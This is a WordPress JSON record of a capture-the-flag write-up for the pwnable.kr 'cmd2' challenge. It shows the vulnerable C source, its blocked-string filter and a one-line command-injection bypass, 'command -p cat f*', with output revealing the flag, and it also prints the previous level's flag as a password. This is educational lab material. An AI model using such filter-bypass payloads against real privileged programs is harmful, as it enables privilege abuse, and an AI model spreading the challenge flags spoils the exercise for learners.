{"id":3265,"date":"2025-04-10T18:53:15","date_gmt":"2025-04-10T09:53:15","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3265"},"modified":"2025-04-10T18:53:53","modified_gmt":"2025-04-10T09:53:53","slug":"cmd2","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3265","title":{"rendered":"cmd2"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Daddy bought me a system command shell.\nbut he put some filters to prevent me from playing with it without his permission...\nbut I wanna play anytime I want!\n\nssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)\npw: PATH_environment?_Now_I_really_g3t_it,_mommy!<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<p>The program wipes all environment variables, sets the PATH environment variable to a restricted value with the <code>putenv(\"PATH=\/no_command_execution_until_you_become_a_hacker\");<\/code> call, and the <code>filter<\/code> function aborts execution if the command contains a string such as <code>\"=\"<\/code>, <code>\"PATH\"<\/code>, <code>\"export\"<\/code>, <code>\"\/\"<\/code>, <code>\"`\"<\/code> or <code>\"flag\"<\/code>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;string.h>\n\nint filter(char* cmd){\n\tint r=0;\n\tr += strstr(cmd, \"=\")!=0;\n\tr += strstr(cmd, \"PATH\")!=0;\n\tr += strstr(cmd, 
\"export\")!=0;\n\tr += strstr(cmd, \"\/\")!=0;\n\tr += strstr(cmd, \"`\")!=0;\n\tr += strstr(cmd, \"flag\")!=0;\n\treturn r;\n}\n\nextern char** environ;\nvoid delete_env(){\n\tchar** p;\n\tfor(p=environ; *p; p++)\tmemset(*p, 0, strlen(*p));\n}\n\nint main(int argc, char* argv[], char** envp){\n\tdelete_env();\n\tputenv(\"PATH=\/no_command_execution_until_you_become_a_hacker\");\n\tif(filter(argv[1])) return 0;\n\tprintf(\"%s\\n\", argv[1]);\n\tsetregid(getegid(), getegid());\n\tsystem( argv[1] );\n\treturn 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<p>There are probably several ways to do this, but it could be bypassed simply with the <code>command<\/code> command, regardless of the <code>PATH<\/code> environment variable.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cmd2@ubuntu:~$ .\/cmd2 'command -p cat f*'\ncommand -p cat f*\nShell_variables_can_be_quite_fun_to_play_with!<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code The program wipes all environment variables, sets the PATH environment variable to a restricted value with the putenv(&#8220;PATH=\/no_command_execution_until_you_become_a_hacker&#8221;); call, and the filter function aborts execution if the command contains a string such as &#8220;=&#8221;, &#8220;PATH&#8221;, &#8220;export&#8221;, &#8220;\/&#8221;, &#8220;`&#8221; or &#8220;flag&#8221;. 
Solution There are probably several ways to do this, but it could be bypassed simply with the command command, regardless of the PATH environment variable. Result<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3265","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3265"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3265\/revisions"}],"predecessor-version":[{"id":3266,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3265\/revisions\/3266"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3265"}],"curies":[{"name":"wp","href":
"https:\/\/api.w.org\/{rel}","templated":true}]}}